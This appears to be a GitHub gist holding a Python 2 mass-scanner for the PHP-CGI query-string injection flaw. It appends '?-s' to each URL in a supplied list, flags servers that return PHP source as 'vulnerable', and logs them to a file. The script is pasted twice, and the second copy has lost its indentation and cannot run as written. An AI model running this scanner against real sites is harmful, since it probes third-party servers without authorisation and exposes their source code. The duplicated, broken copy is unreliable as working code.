starenka/phpfcgi.py

## phpfcgi.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pip install requests gevent

import os, sys
from optparse import OptionParser

from requests import async


def pre_req(request):
    print u'[-] trying %s' % request.url
    return request

def resp(response):
    global vulnerable
    url = response.request.url
    if response.error:
        print  u'[!] %(url)s %(error)s' % {'error': response.error, 'url': url}
    else:
        if response.text.startswith('<code>'):
            vulnerable.write(u'%s\n' % url)
            print u'[+] %s is vulnerable' % url
        else:
            print u'[-] %s NOT vulnerable' % url
    return response

usage = '%s --help' % __file__
parser = OptionParser(usage)
parser.add_option('-o', '--timeout', action='store', dest='timeout', default=50, help='timeout')
parser.add_option('-c', '--concurrency', action='store', dest='concurrency', default=9, help='max concurrency')
parser.add_option('-l', '--list', action='store', dest='list', default=None, help='url list')
(options, args) = parser.parse_args()

if not options.list:
    sys.exit('[!] Supply url list w/ -l arg')

list_file = open(os.path.expandvars(options.list), 'r')
log_file, urls = os.path.join(os.path.expandvars(os.getcwd()), 'vulnerable'), list_file.read().splitlines(False)

if not os.path.exists(log_file):
    f = open(log_file, 'w').close()
vulnerable = open(log_file, 'a+', 0)

hooks = dict(response=resp, pre_request=pre_req)
requests = (async.get('%s?-s' % one, timeout=int(options.timeout), hooks=hooks) for one in urls)

async.map(requests, size=int(options.concurrency))
vulnerable.close()
list_file.close()
	#!/usr/bin/env python
	# -- coding: utf-8 --
	# pip install requests gevent

	import os, sys
	from optparse import OptionParser

	from requests import async


	def pre_req(request):
	print u'[-] trying %s' % request.url
	return request

	def resp(response):
	global vulnerable
	url = response.request.url
	if response.error:
	print u'[!] %(url)s %(error)s' % {'error': response.error, 'url': url}
	else:
	if response.text.startswith('<code>'):
	vulnerable.write(u'%s\n' % url)
	print u'[+] %s is vulnerable' % url
	else:
	print u'[-] %s NOT vulnerable' % url
	return response

	usage = '%s --help' % __file__
	parser = OptionParser(usage)
	parser.add_option('-o', '--timeout', action='store', dest='timeout', default=50, help='timeout')
	parser.add_option('-c', '--concurrency', action='store', dest='concurrency', default=9, help='max concurrency')
	parser.add_option('-l', '--list', action='store', dest='list', default=None, help='url list')
	(options, args) = parser.parse_args()

	if not options.list:
	sys.exit('[!] Supply url list w/ -l arg')

	list_file = open(os.path.expandvars(options.list), 'r')
	log_file, urls = os.path.join(os.path.expandvars(os.getcwd()), 'vulnerable'), list_file.read().splitlines(False)

	if not os.path.exists(log_file):
	f = open(log_file, 'w').close()
	vulnerable = open(log_file, 'a+', 0)

	hooks = dict(response=resp, pre_request=pre_req)
	requests = (async.get('%s?-s' % one, timeout=int(options.timeout), hooks=hooks) for one in urls)

	async.map(requests, size=int(options.concurrency))
	vulnerable.close()
	list_file.close()